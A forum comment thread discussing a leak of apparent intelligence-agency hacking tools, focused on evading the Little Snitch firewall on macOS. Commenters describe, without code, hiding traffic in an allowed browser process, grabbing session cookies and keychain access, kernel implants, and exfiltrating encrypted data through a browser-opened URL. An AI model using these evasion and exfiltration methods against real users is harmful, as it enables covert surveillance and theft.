Stranger is that they feel like they need to open a "hidden" browser instance to connect to the internet. A browser isn't really a necessary part of establishing a connection -- unless there's some missing context here. Is my grandmother running the CIA data ops division?
Edit: it's been made clear to me that of course this is one of few viable vectors when approaching outbound network with a really restrictive firewall (like Little Snitch). If a browser is already approved on making a given connection, then using a headless instance to do network talking is a smart way to do it. If you roll your own net code, a tool like LS will notify user and/or block. Dumb me!
Exactly. Firewalls like Little Snitch primarily filter traffic primarily based on the binary initiating the connection, and only secondarily based on the target port or address. When little snitch pops up the 10th time in 30 seconds, you will just approve all traffic from your browser, so using the browser to send all traffic is great way to avoid being caught.
As for what "injecting into little snitch" means, it could either mean injecting code into little snitch, because little snitch probably doesn't filter itself OR injecting a rule into little snitch.
Little Snitch does filter itself, but the Allow rules are there by default. I remember on a previous version, one of the steps to pirate LS was adding a rule to block it from connecting to it's servers.
Casually browsing the archive, I saw something related to injecting payloads into OSX applications. The application that did this required the latest version of XCode to compile, according to the installation and build docs.
I mean they could just write some net code that sends packets to whatever port, but launching IE and doing everything over HTTPS or whatever is much more stealthy when it comes to network monitoring and system logs.
But why not spend ten minutes and make their net code use SSL and then avoid it altogether?
I guess one could argue that the footprint of adding SSL client behavior to a sneaky hidden tracker might be shitty to do and make it more identifiable. But also SSL libraries are typically linkable on the host system anyway, no compilation past the headers needed.
It's just a weird "workaround" on their part if that's the intention.
Perhaps bots are more easily discernible from a human user who's using a real browser. If the goal is to be stealthy, then they'd want to appear as human-like as possible.
Windows has very sophisticated firewalling and network access can be filtered on a per-process, per-network basis.
Restrictive companies will only allow pre-approved applications, for specific ports, like I.E. doing HTTP/S over ports 80 and 443, and only on approved/trusted networks.
Correct. It is likely users allow their primary browser full access to all hosts on ports 80 and 443, if not all ports.
Additionally, launching the browser gives you easy access to all the tastey session cookies and access to their keychain (I assume a lot of people give their default browser on OSX keychain access).
I would guess that the hidden browser could have access to data (login cookies, browser history, combined with another vulnerability maybe even anything the user enters in other browser windows) that a separate program would not have accesss to.
Lol good point. I meant to imply the history that the ISP would see, not the local one. Although a hidden browser wouldn't be necessary for that anyway. Never mind :)
Little Snitch will warn you (ask permission) if a new process wants to connect to the internet. If the beacon can pass information through an browser process though, I expect most people have Little Snitch rules to allow their browser to send any traffic without warnings.
1. Only a tiny minority of macOS users use Little Snitch, and they're not necessarily the most sensitive/interesting targets.
2. If you're competent and you have enough privileges to inject a DLL into anything, the odds are overwhelming that you also own the kernel. Why would you waste time with a goofy firewall add-on package?
I joked on Twitter but I'm "ha ha only serious" about this: if you had this entire portfolio of tools and exploits 2 years ago, I'm not sure you could have gotten a job at Immunity. The leak is fascinating. The technical details: not so much.
I thought the Shadow Brokers/Equation Group dump demonstrated a not-especially-skillful group of inexperienced-seeming pentesters who happened to have acquired some interesting bugs on the black market. Today's dump shows a team that's way less impressive even than that.
Little Snitch users are the kind of people who can and would expose CIA beacon signals. It's not so much that LS users are juicy targets, but rather that they are substantial exposure risks.
You might say, well, just piggy-back the signal on something else. Indeed, that is better. But that solution is far more complicated because you have to control (cooperatively, or coercively) a legitimate end-point.
Ergo, I don't think it's clownish at all for the CIA to target LS, it addresses a real threat (to them).
That's not what he was saying. Yes, it would of course be a good idea to try to hide the malware implants from tools like Little Snitch. It's just that the method they propose of going about it is really dumb.
What tptacek is saying is that instead of writing some hand-tailored userspace code to specifically fool Little Snitch, they should just be using a kernel module that will hide the network and process activity from all analysis tools. That's what most nation-state malware does (or tries to do).
Using kernel implants to hide signals from these kinds of network security tools is literally 1990s-grade hacker opsec. It's the actual, precise use case for which "amodload" was written, in 1996, by a 20-year-old, for a closed-source OS. I stand by my assessment.
...But what if you can implant into the kernel? Also, what if you don't want to use a full-featured zero-day kernel exploit if you can get your target with a somewhat lower tech exploit?
Clever to just recover all your data using a browser process which has (likely) already been fully authorized to exfiltrate data.
So, rather than targeting LS they would target the kernel with a patch to make LS (and all tools like it) blind to their traffic.
Clearly that's a neater and more complete approach, but there still might be reasons to target a specific app instead of the kernel. It might just be easier and less error prone. (Monkey-patching a running kernel's networking innards has got to pose serious risk to the underlying system's stability, increasing the likelihood that the target will simply reinstall the OS. That's fine for a DoS attack, but not for something like this).
I don't swim in these circles so forgive my ignorance -- What is significant about Immunity? Are you saying these exploits are trivial and/or old news?
The whole wiki that this leak released is full of the most basic configuration options for vim/VS etc. They have version control tutorials. They can't be hiring pros.
I'm just a little weirded out how this list is, in style, identical to many of the lists I've created and have open right now. I need this to be a bit more "henchmanny" and a bit less "average Joe/Jane sitting at their desk under the florescent lights drinking coffee and idly thinking about the workweek ahead."
This actually made me burst out laughing and conveyed my thoughts exactly. It's like when you become old enough to realize your parents are fallible and have been winging it the whole time.
It's possible I've misunderstood, but I don't think they're trying to inject Little Snitch. I think they're trying to inject into Little Snitch, in order to evade its restrictions.
Little Snitch is a host-based application firewall for Mac OS X. It can be used to monitor applications, preventing or permitting them to connect to attached networks through advanced rules.
If you only need to send data once per week, and that data is less than 2K, simply encrypt it, make it part of a URL that you control, then tell the default browser to open that URL. Nearly everybody has configured Little Snitch so that the browser can connect to anything (because the popups quickly annoy). Then do a redirect on your server to something innocuous, and the user will quickly forget.
Or even better use window.close() then the user will only see the browser window open briefly. Of course if the user has JavaScript disabled, use HTTP 302 Found or HTML meta refresh to redirect, blah blah.
So, apart from not demonstrating very high skill level (already discussed in other comments written by people that seem knowledgeable), how is this even remotely morally shady? They clearly discuss penetrating particular target systems — isn't that exactly what you would expect your intelligence/counter-intelligence service to do?
I'd wager LS users are more tech-savvy and less likely to be using more mainstream tools like Norton or McAfee - they want one tool that gives them control over what programs have network access, not a bloated adware platform.
Their goal is to suborn and evade it. In context, "inject into" should be understood to mean "to inject code or configuration of choice into a software package".
This is a pretty interesting fly-by attack. Insinuation, not evidence based. Asking questions and having a conversation is why the rest of us are here. What is your goal by attacking the credibility of other people in the conversation?
EDIT: 128 days old, no prior comments or submissions.
Edit: it's been made clear to me that of course this is one of few viable vectors when approaching outbound network with a really restrictive firewall (like Little Snitch). If a browser is already approved on making a given connection, then using a headless instance to do network talking is a smart way to do it. If you roll your own net code, a tool like LS will notify user and/or block. Dumb me!